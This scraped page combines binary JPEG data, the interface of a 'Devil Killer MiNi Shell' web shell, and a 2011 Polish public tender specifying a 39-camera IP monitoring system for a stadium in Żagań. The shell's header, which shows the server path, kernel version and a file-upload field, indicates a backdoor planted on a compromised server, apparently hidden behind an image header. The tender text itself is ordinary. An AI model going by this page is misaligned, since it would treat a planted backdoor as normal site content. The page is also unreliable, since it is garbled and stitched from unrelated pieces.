JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111007/325696-N-2011.html

<p class="kh_header"><b>Żagań: Wykonanie Systemu Monitoringu Stadionu Sportowego ARENA w Żaganiu przy ulicy Kochanowskiego na działce ewid. Nr 1844/68.</b><br>
<b>Numer ogłoszenia: 325696 - 2011; data zamieszczenia: 07.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pałac Książęcy sp. z o. o. , ul. Szprotawska 4, 68-100 Żagań, woj. lubuskie, tel. 068 4776464, faks 068 4776462.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.palac.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Miejska spółka z ograniczona odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie Systemu Monitoringu Stadionu Sportowego ARENA w Żaganiu przy ulicy Kochanowskiego na działce ewid. Nr 1844/68..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zadania pn. Wykonanie Systemu Monitoringu Stadionu Sportowego ARENA w Żaganiu przy ulicy Kochanowskiego na działce ewid. Nr 1844/68. Wykonawca zobowiązuje się wykonać przedmiot zamówienia z należytą starannością, zgodnie z załączoną dokumentacją oraz zasadami wiedzy technicznej, jak również zgodnie z postanowieniami projektu umowy. 

A.	Wstęp
Projektowany system monitoringu wizyjnego ma zapewnić rejestrację imprez masowych zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 10 stycznia 2011 w sprawie sposobu utrwalania przebiegu imprezy masowej. Dodatkowo pozwoli zabezpieczenie obiektu poza imprezami masowymi poprzez zapewnienie oglądu oraz rejestracji wideo na całym obiekcie oraz w jego bezpośrednim otoczeniu. Dzięki temu możliwe będzie korzystanie z systemu zarówno przez operatorów w Centrum Monitoringu jak i służbom bezpieczeństwa zlokalizowanym z budynku pływalni.

B.	Architektura
Projektowany system musi całkowicie opierać się na technologii IP oraz cyfrowym przetwarzaniu i rejestracji obrazu oraz dźwięku, co zapewni najwyższą możliwą jakość. 
Cyfrowy sygnał z kamer o rozdzielczościach od 1 do 5 megapikseli oraz z enkoderów audio jest wysyłany do serwerów rejestrujących poprzez łącza Ethernet. Operatorzy łączą się do serwerów rejestrujących za pomocą oprogramowania klienckiego również przy użyciu łączy Ethernet. Niedozwolone jest stosowanie kamer z wyjściem analogowym podłączonych do koderów wideo.

C.	Charakterystyka systemu
Poniżej wymieniono podstawowe cechy systemu
Charakterystyka oprogramowania serwera:

-	praca w architekturze klient-serwer, w tym wiele serwerów i jeden klient oraz wiele serwerów i wiele stacji klienckich,
-	otwarta architektura klient-serwer pozwalająca na podłączenie do systemu nielimitowanej liczby nowych urządzeń,
-	możliwość nagrywania do 96 kamer na jednym serwerze, 
-	wspieranie dla kamer sieciowych obsługujących kompresje MJPEG, JPEG2000, MPEG4, H.264,
-	autoryzacja z wykorzystaniem skonfigurowanych i opisanych użytkowników wraz z możliwości importu użytkowników z domeny systemu Windows
-	obsługa kamer wysokich rozdzielczości (kamer megapixelowych) do 16 Mpix włącznie,
-	ustawienia rejestracji z indywidualnie (dla każdej rejestrowanej kamery) dobranymi parametrami zapisu, 
-	ustawienia parametrów rejestracji: ilość klatek/s, rozdzielczość, jakość kompresji 
-	nagrywanie ciągłe, nagrywanie z detekcją ruchu lub zdarzenia, 
-	możliwość konfigurowania stref prywatności w polu widzenia jednej kamery,
-	możliwość konfigurowania stref detekcji ruchu w polu widzenia jednej kamery,
-	obsługa detekcji ruchu, zdarzeń alarmowych, wejść / wyjść alarmowych, stref prywatności z podłączonych kamer z powiadamianiem na e-mail,
-	alarmowanie o zaniku obrazu na którejś z kamer, sabotażu,
-	zapisywanie alarmów oraz informacji o systemie w centralnej bazie danych,
-	możliwość  sterowania kamerami obrotowymi PTZ, 
-	możliwość konfigurowania tras patrolowych dla kamer obrotowych,
-	wysterowanie kamery obrotowej we wcześniej zaprogramowaną pozycją presetu poprzez zdarzenie alarmowe (detekcja ruchu, alarm, itp.),
-	możliwość zaimplementowania narzędzi /algorytmów/ inteligentnej analizy obrazu (np. rozpoznawania tablic rejestracyjnych)
-	sterowanie wejściami i wyjściami alarmowymi kamer i wideo serwerów,
-	możliwość niezależnego przyporządkowania uprawnień każdemu z użytkowników systemu: podgląd na żywo, sterowanie PTZ, blokowanie sterowaniem PTZ, odtwarzanie zarejestrowanego materiału, eksport materiału wideo, konfiguracja systemu, zarządzanie użytkownikami,
-	funkcja raportowania o aktywności użytkowania oraz o zdarzeniach w systemie. Możliwość zapisania wyników raportu do pliku.

Charakterystyka oprogramowania stacji operatorskiej /klienckiej/:
Zastosowane oprogramowanie stacji operatorskiej musi być dostępne w polskiej wersji językowej. Oprogramowanie poza obsługą kamer (wyświetlanie, sterowanie, zarządzanie alarmami), musi umożliwić prezentowanie wielopoziomowych map z zaznaczonymi obiektami i polami widzenia kamer oraz umożliwia w wygodny sposób przełączania się pomiędzy tymi obiektami.
Poniżej przedstawiona została lista funkcji, które musi udostępniać oprogramowanie stacji klienckiej:
-	oglądanie pełnych jakościowo obrazów: JPEG, JPEG2000, MPEG4, H.264,  
-	wsparcie pracy wielomonitorowej (stanowiska 1, 2, 3 lub 4 monitorowe),
-	możliwość uzyskania podglądu w podziale od 1 x 1 do 6 x 6 na każdym monitorze,
-	możliwość wyświetlania widoków z kamer na żywo, widoków z materiału zarejestrowanego, wielowarstwowych map, stron html,
-	możliwość swobodnego wyboru co ma być wyświetlane na wybranym polu: widok z kamery, mapa, strona html,
-	wyszukiwanie zarejestrowanego materiału wideo w oparciu o wielorakie kryteria np. zdarzenia typu (wykryto ruch), aktywności wejść alarmowych, indeksy, oś czasu, itp.,  
-	funkcja dołączania programu klienckiego do oglądania nagrań eksportowanych na zewnętrzne nośniki np: CD lub DVD,
-	cyfrowy zoom w podglądzie na żywo oraz przy odtwarzaniu nagrań z archiwum,
-	kontrola bieżącego stanu i alarmów z serwerów rejestrujących, kamer sieciowych, urządzeń wejść/wyjść, innych urządzeń zewnętrznych (np. czujek PIR), systemów kontroli dostępu,
-	wielopoziomowe, hierarchiczne, przejrzyste mapy umożliwiające wskazanie zasięgu danej kamery,
-	możliwość wyboru kamery z poziomu mapy terenu,
-	możliwość przekazania informacji z tego samego alarmu wielu operatorom systemu,
-	pełne zarządzanie opcjami alarmów (przejmowanie, zatwierdzanie),
-	autoryzacja z wykorzystaniem skonfigurowanych i opisanych użytkowników wraz z możliwości importu użytkowników z domeny systemu Windows,
-	sterowanie kamerami obrotowymi za pomocą myszy komputerowej lub joysticka, 
-	transmisja dźwięku: od wideo serwera do oprogramowania klienckiego,  obsługa dźwięku w podglądzie na żywo oraz w podglądzie przy odtwarzaniu nagrań z archiwum,
-	polska wersja oprogramowania.
Współpraca oprogramowania z szeregiem dostępnych na rynku rozwiązań sprzętowych: kamer sieciowych o standardowych i podwyższonych rozdzielczościach (kamery megapikselowe), kamer analogowych, serwerów wizyjnych - zapewni możliwość dalszej rozbudowy systemu  o kolejne urządzenia, kamery podłączane do struktury sieci IP.
Licencja na oprogramowanie, zakupiona jednorazowo i ważna dożywotnio !!!
Podstawowe parametry funkcjonalno-użytkowe dla systemu:
-	ciągła obserwacja obrazów z wszystkich kamer wraz z jednoczesną, ciągłą, automatyczną (zgodnie z harmonogramem) ich rejestracją,
-	możliwość zdalnego (z dowolnego miejsca systemu), ręcznego i automatycznego sterowania parametrami (Pan/Tilt/Zoom) kamer wielu producentów,
-	niezależne definiowanie parametrów dla każdej kamery (nagrywanie, obserwacja, sterowanie),
-	transmisja po istniejących włóknach światłowodowych cyfrowych sygnałów (wizji, sterowań, sygnałów dodatkowych),
-	jednoczesna archiwizacja obrazu i jego odtwarzanie na wielu stanowiskach oglądowych w tym samym czasie,
-	archiwizacja nagrań na nośnikach DVD i CD.

	Szczegółowe parametry funkcjonalno-użytkowe dla systemu:
-	rozbudowa systemu ma być możliwa w każdej chwili nawet o pojedynczą kamerę,
-	niezależnie dla każdej kamery definiowane parametry nagrywania, transmisji, sterowania,
-	jednoczesny zapis wielu kanałów wideo,
-	centralne zarządzanie uprawnieniami wszystkich użytkowników systemu,
-	alarmowanie w Głównym Centrum Monitoringu o zaniku sygnału wideo na którymś z wejść,
-	możliwość wyświetlania obrazów z kamer w formatach okien podzielonych,
-	zdalne sterowanie kamerami obrotowymi (Pan/Tilt/Zoom) różnych producentów,
-	możliwość wykonywania zbliżeń z danej kamer z jednoczesną bezstratną rejestracją obrazu z całego pola widzenia kamery i optymalizacją wykorzystania pasma transmisji podczas tej operacji,
-	możliwość tworzenia wielowarstwowych map terenu objętego zasięgiem kamer,
-	możliwość umieszczania na mapach punktów kamerowych wraz z graficznym określeniem zasięgu pola ich widzenia ,
-	możliwość natychmiastowego uzyskania obrazu z wybranego punktu kamerowego poprzez kliknięcie (ikony kamery) na mapie wraz z uzyskaniem predefiniowanych obrazów z danej kamery np. sceneria ogólna wraz z jednoczesną wizualizacją  wybranych miejsc w polu widzenia danej kamery (wybór z poziomu listy, mapy terenu),
-	możliwość sterowania kamerami obrotowymi przez uprawnione osoby na każdym stanowisku operatorskim /SO/ w systemie za pomocą pulpitu sterującego zintegrowanego z komputerem PC i/lub konsoli wirtualnej wbudowanej w aplikację klienta,
-	możliwość zarządzania nagranym materiałem, a w szczególności zbliżania dowolnie wybranego fragmentu z zapewnieniem jakości pozwalającej na weryfikację szczegółów obiektu (np. tablicy rejestracyjnej dla samochodu),
-	przesyłanie obrazów optymalnej jakości pomiędzy serwerami rejestrującymi a stacjami operatorskimi /SO/,
-	możliwość przesyłania tylko wybranych fragmentów obrazu pomiędzy serwerami rejestrującymi a stacjami operatorskimi /SO/ w celu optymalizacji dostępnego pasma z zastrzeżeniem rejestracji na serwerach zapisu obrazów z najlepszą dostępną  jakością, 
-	obserwacja stanu wejść alarmowych, ciągłe monitorowanie i powiadamianie w Głównym Centrum Monitoringu (z wyświetlaniem odpowiedniego komunikatu) o każdym zaniku sygnału, zasilania, otwarciu drzwi, itp. szafki Punktów Kamerowych,
-	rejestracja zdarzeń alarmowych w bazie zawierającej datę, czas wystąpienia i opis zdarzenia,
-	możliwość elastycznego kreowania reguł definiujących automatyczne reakcje systemu na dane zdarzenia (system powinien umożliwiać automatyczne reagowanie na wcześniej zdefiniowane zdarzenia i alarmy),
-	możliwość elastycznego konfigurowania pracy danej kamery przy użyciu kalendarza pozwalającego na wybór trybów pracy: rejestracja całości materiału, ruchu, zdarzeń, brak rejestracji przy jednoczesnym podglądzie (na żywo), itp.,
-	możliwość zwiększenia liczby stanowisk operatorskich /SO/ w systemie (nie mniej niż do 20),
-	możliwość uruchomienia stanowisk operatorskich w dowolnej lokalizacji w oparciu o sieć komputerową systemu monitoringu,
-	administracja systemu z dowolnej stacji operatorskiej włączonej do sieci komputerowej systemu monitoringu
D.	Kamery

Uwzględniając wymogi prawne oraz uwagi inwestora, obiekt podzielono na kilka stref:
1.	bezpośrednie otoczenie obiektu, w tym
a.	garaże od zachodu
b.	okolice dojścia do trybuny gości
c.	parkingi przed budynkami basenu oraz hali sportowej
2.	ciągi komunikacyjne na terenie obiektu, w tym
a.	bramy wejściowe
b.	dojścia do kas biletowych i kołowrotów
c.	dojścia do hali sportowej i Sali squasha
d.	dojścia do trybun
e.	korytarze wewnątrz budynku hostelu
3.	kasy biletowe
4.	trybuny
5.	płyta boiska

Mając na względzie powyższe, zaprojektowano system składający się z 39 kamer:
1.	do oglądu ciągów komunikacyjnych na zewnątrz budynków, garaży oraz parkingów - kamery stałe o rozdzielczości od 1 do 5 megapikseli
2.	do oglądu ciągów komunikacyjnych wewnątrz budynków oraz kas biletowych - kamery stałe kopułkowe o rozdzielczości 1 megapiksel
3.	do oglądu trybun - kamery stałe o rozdzielczości 5 megapikseli (IV kategoria) oraz kamery szybkoobrotowe o rozdzielczości 2 megapikseli (I i II kategoria)
4.	do oglądu płyty boiska  - kamery stałe o rozdzielczości 5 megapikseli (IV kategoria) oraz kamery szybkoobrotowe o rozdzielczości 2 megapikseli (I i II kategoria)

Plan obiektu z naniesionymi punktami kamerowymi oraz polami widzenia znajduje się w załączniki Nr 1 do projekty technicznego.
Do każdego punktu kamerowego doprowadzone zostanie zasilanie 230VAC.
Wszystkie kamery posiadają obiektywy przystosowane do kamer megapikselowych.
Kamery stacjonarne zainstalowane na zewnątrz budynku posiadają wodoszczelną obudowę z grzałką.
Kamery obrotowe posiadają wodoszczelną obudowę.
Pełna lista kamer znajduje się w załączniku Nr 2 do projektu technicznego.
E.	Rejestracja dźwięku
Do rejestracji dźwięku zaprojektowano 6 mikrofonów kierunkowych skierowanych na trybunę i podłączonych do enkoderów audio.
Mikrofony umieszczone są parami na trzech słupach znajdujących między bieżnią a boiskiem.
Mikrofony podłączone są do koderów IP za pomocą kabla ekranowanego zakończonego wtykiem mini jack.
F.	 Infrastruktura sieciowa
Infrastrukturę sieciową należy dobrać tak, aby zapewnić ciągła pracę wszystkich kamer oraz pełną funkcjonalność systemu. 
Serwerownię oraz centralny punkt dystrybucyjny przewidziano w wydzielonym pomieszczeniu na I piętrze budynku hostelu.
G.	 Wyposażenie centrum monitoringu
Centrum Monitoringu wyposażone będzie w 2 stanowiska operatorskie. Każde ze stanowisk składać się będzie z  komputera klasy PC wyposażonego w kartę graficzną umożliwiającą podłączenie dwóch monitorów. Do każdego z komputerów podłączone będą po 2 monitory o rozmiarze co najmniej 20 cali i rozdzielczości FullHD (1920x1080). Do każdego komputera podłączona będzie drukarka umożliwiająca wydrukowanie zdjęcia bezpośrednio z systemu monitoringu. Dodatkowymi elementami wyposażenia stanowiska operatorskiego będą: klawiatura, myszka, panel operatorski z 3-osiowym joystickiem.
H.	 Szczegółowa specyfikacja sprzętowa proponowanego rozwiązania

Punkt kamerowy typ 1: kompaktowa kamera IP typu dzień/noc o rozdzielczości co najmniej 0,9 MP z obudową zewnętrzną
-	przetwornik obrazu: CMOS formatu co najmniej 1/2,7 ze skanowaniem progresywnym
-	liczba aktywnych pikseli nie mniej niż: 1280 (H) x 720 (V)
-	szybkość przetwarzania obrazu co najmniej 30 klatek/s przy pełnej rozdzielczości
-	obsługa minimum jednej z następujących kompresji obrazu: JPEG2000, H.264, MJPEG
-	rzeczywisty zakres dynamiczny: co najmniej 69 dB
-	tryby pracy dziennej i nocnej (filtr ICR)
-	minimalne natężenie światła: 0,4 lux lub mniej w trybie kolorowym; 0,04 lux lub mniej w trybie monochromatycznym 
-	obiektyw zintegrowany o ogniskowej od 5mm (lub mniej) do 80 mm (lub więcej) o jasności co najmniej F1.6
-	dostępna z poziomu  aplikacji zarządzającej możliwość regulacji ogniskowej
-	automatyczna, dostępna z poziomu aplikacji zarządzającej, możliwość sterowania ostrością wsparta funkcją autofocus
-	obsługa wielu (co najmniej dwóch) strumieni wideo
-	automatyczne albo ręczne sterowanie przesłoną i czasem ekspozycji
-	automatyczny i ręczny tryb dzień/noc
-	automatyczna i ręczna regulacja balansu bieli
-	wejście audio, kompresja audio G.711 PCM 8 kHz 
-	analogowe wyjście wideo
-	sprzętowe wykrywanie ruchu
-	możliwość skonfigurowania co najmniej trzech stref prywatności
-	cyfrowe wejście alarmowe, cyfrowe wyjście alarmowe
-	Możliwość zasilania: PoE (PowerOverEthernet), 24 VAC, 12 VDC
-	standard interfejsu sieciowego: 100BASE-TX
-	szyfrowana transmisja sygnału wideo
-	mocowanie za pomocą śruby 1/4 UNC-20 (od góry i od dołu)
-	możliwość pracy w zakresie temperatur od -10 st. C. do +50 st. C. lub szerszym
obudowa:
-	Osłona przeciwsłoneczna
-	Obudowa wyposażona w grzałkę (zasilanie 230 VAC)
-	Uchwyt ścienny, adapter słupowy
-	ilość: 3 szt.

Punkt kamerowy typ 2: kopułowa kamera IP typu dzień/noc o rozdzielczości co najmniej 0,9 MP, wewnętrzna
-	przetwornik obrazu: CMOS formatu co najmniej 1/2,7 ze skanowaniem progresywnym
-	liczba aktywnych pikseli nie mniej niż: 1280 (H) x 720 (V)
-	szybkość przetwarzania obrazu co najmniej 30 klatek/s przy pełnej rozdzielczości
-	obsługa minimum jednej z następujących kompresji obrazu: JPEG2000, H.264, MJPEG
-	rzeczywisty zakres dynamiczny: co najmniej 69 dB
-	tryby pracy dziennej i nocnej (filtr ICR)
-	minimalne natężenie światła: 0,2 lux lub mniej w trybie kolorowym; 0,02 lux lub mniej w trybie monochromatycznym
-	obiektyw zintegrowany o ogniskowej od 3mm (lub mniej) do 9 mm (lub więcej) o jasności co najmniej F1.2
-	dostępna z poziomu  aplikacji zarządzającej możliwość regulacji ogniskowej
-	automatyczna, dostępna z poziomu aplikacji zarządzającej, możliwość sterowania ostrością wsparta funkcją autofocus
-	obsługa wielu (co najmniej dwóch) strumieni wideo
-	automatyczne albo ręczne sterowanie przesłoną i czasem ekspozycji
-	automatyczny i ręczny tryb dzień/noc
-	automatyczna i ręczna regulacja balansu bieli
-	wejście audio, kompresja audio G.711PCM 8 kHz 
-	analogowe wyjście wideo
-	sprzętowe wykrywanie ruchu
-	możliwość skonfigurowania co najmniej trzech stref prywatności
-	cyfrowe wejście alarmowe, cyfrowe wyjście alarmowe
-	zakres regulacji kierunku patrzenia: 360 stopni w poziomie, 180 stopni w pionie, 360 stopni w osi patrzenia
-	Możliwość zasilania: PoE (PowerOverEthernet), 24 VAC, 12 VDC
-	standard interfejsu sieciowego: 100BASE-TX
-	szyfrowana transmisja sygnału wideo
-	możliwość pracy w zakresie temperatur od -10 st. C. do +50 st. C. lub szerszym

-	ilość: 8 szt.

Punkt kamerowy typ 3: kopułowa kamera IP typu dzień/noc o rozdzielczości co najmniej 0,9 MP, zewnętrzna
-	przetwornik obrazu: CMOS formatu co najmniej 1/2,7 ze skanowaniem progresywnym
-	liczba aktywnych pikseli nie mniej niż: 1280 (H) x 720 (V)
-	szybkość przetwarzania obrazu co najmniej 30 klatek/s przy pełnej rozdzielczości
-	obsługa minimum jednej z następujących kompresji obrazu: JPEG2000, H.264, MJPEG
-	rzeczywisty zakres dynamiczny: co najmniej 69 dB
-	tryby pracy dziennej i nocnej (filtr ICR)
-	minimalne natężenie światła: 0,2 lux lub mniej w trybie kolorowym; 0,02 lux lub mniej w trybie monochromatycznym
-	obiektyw zintegrowany o ogniskowej od 3mm (lub mniej) do 9 mm (lub więcej) o jasności co najmniej F1.2
-	dostępna z poziomu  aplikacji zarządzającej możliwość regulacji ogniskowej
-	automatyczna, dostępna z poziomu aplikacji zarządzającej, możliwość sterowania ostrością wsparta funkcją autofocus
-	obsługa wielu(co najmniej dwóch) strumieni wideo
-	automatyczne albo ręczne sterowanie przesłoną i czasem ekspozycji
-	automatyczny i ręczny tryb dzień/noc
-	automatyczna i ręczna regulacja balansu bieli
-	wejście audio, kompresja audio G.711 PCM 8 kHz 
-	analogowe wyjście wideo
-	sprzętowe wykrywanie ruchu
-	możliwość skonfigurowania co najmniej trzech stref prywatności
-	cyfrowe wejście alarmowe, cyfrowe wyjście alarmowe
-	zakres regulacji kierunku patrzenia: 360 stopni w poziomie, 180 stopni w pionie, 360 stopni w osi patrzenia
-	Możliwość zasilania: PoE(PowerOverEthernet), 24 VAC, 12 VDC
-	standard interfejsu sieciowego: 100BASE-TX
-	szyfrowana transmisja sygnału wideo
-	wbudowana grzałka
-	klasa szczelności IP66 lub wyższa
-	możliwość pracy w zakresie temperatur od -30 st. C. do +50 st. C. lub szerszym

-	ilość: 2 szt.

Punkt kamerowy typ 4: kompaktowa kamera IP typu dzień/noc o rozdzielczości co najmniej FullHD z obudową zewnętrzną
-	przetwornik obrazu: CMOS formatu co najmniej 1/2,7 ze skanowaniem progresywnym
-	liczba aktywnych pikseli nie mniej niż: 1920 (H) x 1080 (V)
-	szybkość przetwarzania obrazu co najmniej 30 klatek/s przy pełnej rozdzielczości
-	obsługa minimum jednej z następujących kompresji obrazu: JPEG2000, H.264, MJPEG
-	rzeczywisty zakres dynamiczny: co najmniej 69 dB
-	tryby pracy dziennej i nocnej (filtr ICR)
-	minimalne natężenie światła: 0,4 lux lub mniej w trybie kolorowym; 0,04 lux lub mniej w trybie monochromatycznym
-	obiektyw zintegrowany o ogniskowej od 5mm (lub mniej) do 80 mm (lub więcej) o jasności co najmniej F1.6
-	dostępna z poziomu  aplikacji zarządzającej możliwość regulacji ogniskowej
-	automatyczna, dostępna z poziomu aplikacji zarządzającej, możliwość sterowania ostrością wsparta funkcją autofocus
-	obsługa wielu (co najmniej dwóch) strumieni wideo
-	automatyczne albo ręczne sterowanie przesłoną i czasem ekspozycji
-	automatyczny i ręczny tryb dzień/noc
-	automatyczna i ręczna regulacja balansu bieli
-	wejście audio, kompresja audio G.711 PCM 8 kHz 
-	analogowe wyjście wideo
-	sprzętowe wykrywanie ruchu
-	możliwość skonfigurowania co najmniej trzech stref prywatności
-	cyfrowe wejście alarmowe, cyfrowe wyjście alarmowe
-	Możliwość zasilania: PoE (PowerOverEthernet), 24 VAC, 12 VDC
-	standard interfejsu sieciowego: 100BASE-TX
-	szyfrowana transmisja sygnału wideo
-	mocowanie za pomocą śruby 1/4 UNC-20 (od góry i od dołu)
-	możliwość pracy w zakresie temperatur od -10 st. C. do +50 st. C. lub szerszym
obudowa:
-	Osłona przeciwsłoneczna
-	Obudowa wyposażona w grzałkę (zasilanie 230 VAC)
-	Uchwyt ścienny

-	ilość: 10 szt.

Punkt kamerowy typ 5: kamera kolorowa IP szybkoobrotowa o rozdzielczości co najmniej FullHD
-	przetwornik obrazu: CMOS formatu co najmniej 1/3 
-	liczba aktywnych pikseli nie mniej niż: 1920 (H) x 1080 (V)
-	szybkość przetwarzania obrazu co najmniej 30 klatek/s przy pełnej rozdzielczości
-	obsługiwana kompresja obrazu: H.264 oraz MJPEG
-	obsługa wielu strumieni wideo
-	tryby pracy dziennej i nocnej (filtr ICR)
-	technologia WDR (Wide Dynamic Range)
-	stosunek sygnału do szumu: co najmniej 50 dB
-	minimalne natężenie światła: 0,5 lux lub mniej w trybie monochromatycznym (F1.8)
-	obiektyw zintegrowany o ogniskowej w zakresie f=4,7-94mm lub szerszym, F1.6-F3.5
-	funkcje moto-zoom i autofocus
-	automatyczne i ręczne sterowanie przesłoną i czasem ekspozycji
-	automatyczna i ręczna regulacja balansu bieli
-	sprzętowe wykrywanie ruchu
-	standard interfejsu sieciowego: 100BASE-TX
-	klasa szczelności IP66 lub wyższa
-	możliwość montażu na słupie o dużej średnicy
-	możliwość pracy w zakresie temperatur od -10 st. C. do +50 st. C. lub szerszym

-	ilość: 5 szt.

Punkt kamerowy typ 6: kompaktowa kamera IP typu dzień/noc o rozdzielczości co najmniej 5MP z obudową zewnętrzną
-	przetwornik obrazu: CMOS formatu co najmniej 1/2,5 
-	liczba aktywnych pikseli nie mniej niż: 2592 (H) x 1936 (V)
-	szybkość przetwarzania obrazu co najmniej 10 klatek/s przy pełnej rozdzielczości
-	obsługiwana kompresja obrazu: H.264 oraz MJPEG
-	tryby pracy dziennej i nocnej (filtr ICR)
-	minimalne natężenie światła: 0,3 lux lub mniej w trybie kolorowym; 0,2 lux lub mniej w trybie monochromatycznym
-	zgodność z obiektywami z mocowaniem C i CS
-	automatyczne albo ręczne sterowanie przesłoną i czasem ekspozycji
-	automatyczny i ręczny tryb dzień/noc
-	automatyczna i ręczna regulacja balansu bieli
-	sprzętowe wykrywanie ruchu
-	wyjście RS-485
